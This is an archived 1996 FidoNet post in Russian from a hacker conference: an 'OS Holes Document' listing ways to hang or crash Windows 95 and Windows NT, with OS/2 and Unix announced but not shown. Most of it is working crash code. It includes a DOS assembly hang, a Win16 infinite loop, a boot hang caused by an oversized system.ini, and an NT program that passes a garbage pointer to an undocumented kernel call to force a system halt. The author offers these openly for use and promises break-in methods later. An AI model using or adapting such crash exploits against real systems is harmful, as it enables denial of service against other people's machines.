Это - достаточно беспорядочный архив сообщений конференций сети fidonet, которые на момент их прочтения мной
показались полезными или интересными. Многие устарели, многие узкоспецифичны и малоинтересны, но может оказаться и что-то новое...
- __techs (2:5015/42) ----------------------------------------------- __techs - Msg : 191 of 1000 Scn From : Sergey Zabaryansky 2:463/81.73 24 Nov 96 20:51:20 To : All 26 Nov 96 06:30:40 Subj : Весим Win95,WinNT,OS/2,Unix ! (1/2) ------------------------------------------------------------------------------- @AREA:RU.HACKER Hi All! Пpедставляю на суд свою статью: /****************************************************** OS Holes Document by Sergey Zabaryansky Version 11-22-96 *******************************************************/ Содержание 1. Введение 2. Windows 95 3. Winodws NT 4. OS/2 5. Unix 1. ВВЕДЕИЕ Цель этой статьи - показать слабые места операционных систем Win95,OS/2,NT,UNIX. В данный момент это понятие включает методы их завешивания/выведения из строя. В дальнейшем планируется включить в тематику также методы их взлома. Данная статья ни в коей мере не претендует на полноту. Я буду благодарен всем кто поможет дополнить/исправить/уточнить эту статью. Если Вы возмущены тематикой или последствиями вызванными этой статьей то cp exclamation /dev/nul. Автор > Сергей Забарянский E-mail root@zssoft.carrier.kiev.ua FIDO 2:463/81.73 Благодарности > Дмитрию Астапову FIDO 2:463/218 2. WINDOWS 95 ******************************** [....] висим [Exec] в DosBox [Type] DOS прога ******************************** code SEGMENT byte public 'CODE' ASSUME cs:code, ds:code ORG 100h start: cli jmp $-2 code ENDS END start ******************************** [....] висим [Exec] как обычно :) [Type] Win16 ******************************** #include <windows.h> int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR szLine,int Cmd) { while(TRUE); } ******************************** [....] висим/перезагружаемся [Exec] [Type] ******************************** Создайте файл system.ini >= 64kb. Тогда система при загрузке повиснет/перезагрузится. Причина: так как обычно system.ini << 64kb то кодировщик Microsoft просто-напросто решил считывать из этого файла 0FFFFh байт. Pезультат можете понаблюдать сами :) 3. WINDOWS NT ******************************** [....] аварийный останов системы [Exec] как обычно :) [Type] Console Win32 [Test] WinNT 4.0 ******************************** #include <windows.h> main() { LONG *Fool=new LONG[10]; _asm mov eax, 0a0h _asm mov edx, [Fool] _asm int 2Eh } Вообще программа выглядит странно, но то, что она делает почти совпадает с недокументированной функцией NtSetInformationFile из ntdll.dll NtSetInformationFile 77f67f60 mov eax, 000000A0h 77f67f65 lea edx, dword ptr [esp+04] 77f67f69 int 2Eh Отличие в том, что я в качестве параметра передаю указатель на мусор. Sergey Zabaryansky --- GEcho 1.02+ * Origin: Идеальным только газ бывает, и то в учебнике по физике (2:463/81.73)
